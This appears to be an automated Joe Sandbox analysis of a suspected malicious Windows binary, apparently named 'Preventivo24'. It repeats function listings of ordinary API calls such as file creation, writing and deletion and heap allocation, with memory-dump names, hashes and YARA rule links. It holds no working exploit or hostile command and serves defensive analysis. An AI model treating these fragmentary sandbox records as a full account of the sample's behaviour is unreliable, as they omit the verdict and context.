Strings

USERPROFILE, xrefs: 00B1E1EA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: EnvironmentFolderHeapPathProcessSpecialVariable
String ID: USERPROFILE
API String ID: 2976596683-2419442777
Opcode ID: ebfd85100046e9ef1fde56b13923b66c230fe9325e01f381384d8fd799aec22f
Instruction ID: 932eb99f6815d557d4dbc6f468e14c0da88bd867680204676b6af7bc4fd734aa
Opcode Fuzzy Hash: ebfd85100046e9ef1fde56b13923b66c230fe9325e01f381384d8fd799aec22f
Instruction Fuzzy Hash: 2971E171A006599FCB11DF68C855BAEB7E9FF84320F544269EC259B391EB30AE00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B6B090 Relevance: 3.2, APIs: 2, Instructions: 158COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B6B0E2
EndDialog.USER32(00000000,00000001), ref: 00B6B0F1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DialogWindow
String ID:
API String ID: 2634769047-0
Opcode ID: a2179693d440c7f664bddbdc6868a914cf3799757d9a478616953c5c0087a1a6
Instruction ID: bfbde8cba76f2bd2858f060f4ac135b3c705a731af21cc5f9884b0a11e80deeb
Opcode Fuzzy Hash: a2179693d440c7f664bddbdc6868a914cf3799757d9a478616953c5c0087a1a6
Instruction Fuzzy Hash: 9B616A70A01648DFCB05CF68C958B5DBBF5FF09320F1582A9E819AB3A1C7749E05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B41B50 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B414A6), ref: 00B41B50
DestroyWindow.USER32(00000000,00000000), ref: 00B41C0B

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DestroyErrorLastWindow
String ID:
API String ID: 1182162058-0
Opcode ID: da880adc7fcb00f5102534203111eb5cdbcc342e784b4e44d64819d036af0ed4
Instruction ID: 8b73d5056594490a70befbec6b1f8168758b1f00eaa3d4421aa9e14b5ad650e7
Opcode Fuzzy Hash: da880adc7fcb00f5102534203111eb5cdbcc342e784b4e44d64819d036af0ed4
Instruction Fuzzy Hash: 8721E775A002099BDB20AF1CEC417AA77D8EB54321F004AA6FC05CB391D7B5E9A1D7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00B216F0 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B20CA0: LoadLibraryW.KERNEL32(ComCtl32.dll,26FBC52C,00000000,00000000,?), ref: 00B20CDA
Part of subcall function 00B20CA0: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00B20D00
Part of subcall function 00B20CA0: FreeLibrary.KERNEL32(00000000), ref: 00B20D89

SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B21732
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B21741

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: LibraryMessageSend$AddressFreeLoadProc
String ID:
API String ID: 3032493519-0
Opcode ID: 15506bead0714717397df46206ddc9407c017410bce540881fc3a9cbcd6ecec4
Instruction ID: 48074bb9f9c196c6ca765fa428d241c5221dbef59372fd82d6c99637c116db2f
Opcode Fuzzy Hash: 15506bead0714717397df46206ddc9407c017410bce540881fc3a9cbcd6ecec4
Instruction Fuzzy Hash: 2AF0B4327503207BE6101A199C46FBBB29DDBC8B20F108219F658DB2C1DDE16C0153E9

Uniqueness

Uniqueness Score: -1.00%

Function 00C02866 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00C0A44A,?,00000000,?,?,00C0A6EB,?,00000007,?,?,00C0AB47,?,?), ref: 00C0287C
GetLastError.KERNEL32(?,?,00C0A44A,?,00000000,?,?,00C0A6EB,?,00000007,?,?,00C0AB47,?,?), ref: 00C02887

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: af1c98f0c83d7132d36e64c41e9be31644daad676c6f218fbca7a77414d49e28
Instruction ID: 65144e6eb535aa608875bdc7f27e891350268e86b9889ef13bddf00b63e53ad4
Opcode Fuzzy Hash: af1c98f0c83d7132d36e64c41e9be31644daad676c6f218fbca7a77414d49e28
Instruction Fuzzy Hash: CDE08632100308A7CB216BA5EC0DB5D3AAAAB41351F1441B1F61C9A0B1D7748991D790

Uniqueness

Uniqueness Score: -1.00%

Function 00B04450 Relevance: 2.6, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,00000000,00000000,00000000,?,?,00B47294,00CA47A0), ref: 00B04468
MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,?,-00000001,?,00B47294,00CA47A0), ref: 00B0449A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 807b1fe8aee1026a3c36687a879bff79f80794bcb937e92ee5973fd3df6e6b56
Instruction ID: 3c5d537408602cdef66bb49c85c7c2b64013b03126efa836f1f6eba83aee2ed3
Opcode Fuzzy Hash: 807b1fe8aee1026a3c36687a879bff79f80794bcb937e92ee5973fd3df6e6b56
Instruction Fuzzy Hash: A601D272301111AFD6109B59DC89F2EBB9AEFD4321F204269F318AB3D0CF606C0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 00BCEEA0 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87f9c48b79b43a10688e82e2f8c96ea46ed8648151945ab46d586e569f956f4
Instruction ID: 457ce560e50e48c982a24184d23debfe522cf30a50b5cbb395cb8e2221e3c065
Opcode Fuzzy Hash: e87f9c48b79b43a10688e82e2f8c96ea46ed8648151945ab46d586e569f956f4
Instruction Fuzzy Hash: 5BA16AB1A05649DFDB04CF64D844B9EBBF4FF08314F1481AEE819AB391D775AA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B69DB0 Relevance: 1.7, APIs: 1, Instructions: 178synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,26FBC52C,?,?,?), ref: 00B69DE4

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 60ef9f8ddd21012ab45edde9a2b5b94a75bf3e08467970a6b1c7c5e6069171d9
Instruction ID: acaa6b2772d32e1708d6c6fe4d6489ef7d86658a71a4e8e70d41191e1d6a78f6
Opcode Fuzzy Hash: 60ef9f8ddd21012ab45edde9a2b5b94a75bf3e08467970a6b1c7c5e6069171d9
Instruction Fuzzy Hash: B86137756046098FCB14DF68C894B6ABBF9FF88310F1641ADE91ADB3A1DB35E805CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E7C0 Relevance: 1.7, APIs: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,26FBC52C,26FBC52C,?,?,00CBD178), ref: 00B5E804

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 81c9ca9902b6ab3045ac4710e68db14268100558f7430bbc8967524a956cb364
Instruction ID: a84652655f28f8e4b099f9d02f2d28e98fc312fc1db3ef77c6110ed5e693e84a
Opcode Fuzzy Hash: 81c9ca9902b6ab3045ac4710e68db14268100558f7430bbc8967524a956cb364
Instruction Fuzzy Hash: 65516C34A01A498FDB05CF6CC94875DBBE5FF49321F1882A9E819DB391DB349E058F91

Uniqueness

Uniqueness Score: -1.00%

Function 00B4B310 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,00B4B450,?), ref: 00B4B35B

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: EnumLanguagesResource
String ID:
API String ID: 4141015960-0
Opcode ID: 316c8a23b8874bb175e2e36e78a6270eeeb8ef841f960ffab35ee337171889d0
Instruction ID: 67695c887e26bdf6bfffc91bf355a9d1e0d02ea219bcb885b8cb3a3aac9feceb
Opcode Fuzzy Hash: 316c8a23b8874bb175e2e36e78a6270eeeb8ef841f960ffab35ee337171889d0
Instruction Fuzzy Hash: 4641917190420A9BDB10DF94C985FDEBBF4FF44314F1041A9E614A7392DB75EA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A2E0 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,26FBC52C,?,?,?,?,?,?,00C45C7D), ref: 00B6A344

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b08d32cc5fffdb0746690ffc0025f4f639a8a503682da3ba96759e1aad89b2c4
Instruction ID: f752e679937b4e210f709fe901f338bca3d864dfd89a903f490c4f67649bbb25
Opcode Fuzzy Hash: b08d32cc5fffdb0746690ffc0025f4f639a8a503682da3ba96759e1aad89b2c4
Instruction Fuzzy Hash: 44219F71A00209EFCB14DF64C845F9EBBF8FB08710F10466AE825A7390DB74A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B644B0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,?,00000000,26FBC52C,00000000,26FBC52C), ref: 00B64546

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6051e1f2bcc3b1f532281c1ab2bc41395e35eb4d442c2ffdc6a838545c7366d6
Instruction ID: d1fa11e69470c721aab09ff19d97b901408c4b335488e4fd51a5fb47198cdf64
Opcode Fuzzy Hash: 6051e1f2bcc3b1f532281c1ab2bc41395e35eb4d442c2ffdc6a838545c7366d6
Instruction Fuzzy Hash: AEF04F71A00658ABCB21CF29CC45F9BB7BCEB49724F104269F825E73D0E7B4A90186A0

Uniqueness

Uniqueness Score: -1.00%

Function 009EB070 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BEC321: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,00000000,8000000B,26FBC52C), ref: 00BEC381

RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID:
API String ID: 3789339297-0
Opcode ID: ccf7b5e358d29483269fb6d9eb49ec1e255db16143e690f24ecab83bc735471b
Instruction ID: 280c6f6bffbdd409698245c8f16e61ee2c142fc90c79cf58aa5673f2acad0031
Opcode Fuzzy Hash: ccf7b5e358d29483269fb6d9eb49ec1e255db16143e690f24ecab83bc735471b
Instruction Fuzzy Hash: 3BF0A77164864CFFC715CF44DD06F5ABBB8FB05B50F008A29F915827A0E775A900DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00C028A0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00C0060A,?,00C04853,?,00000000,?,00BF464A,00000000,00C0060A,?,?,?,?,00C00404), ref: 00C028D2

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 15b6c7784220d2c3df68d8bcbdbba63945d9673ad1c2d96e0a796837736ecf32
Instruction ID: 6c48d6fbfa914a2d53de07132c7ca402b922ce9adec92ef763fff1ff8bb90537
Opcode Fuzzy Hash: 15b6c7784220d2c3df68d8bcbdbba63945d9673ad1c2d96e0a796837736ecf32
Instruction Fuzzy Hash: 29E0ED3B10022597EB2137268C08B6B779A9F027A0F258370ED28AA0C0DB60CD80D2F1

Uniqueness

Uniqueness Score: -1.00%

Function 00C00572 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C00579

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
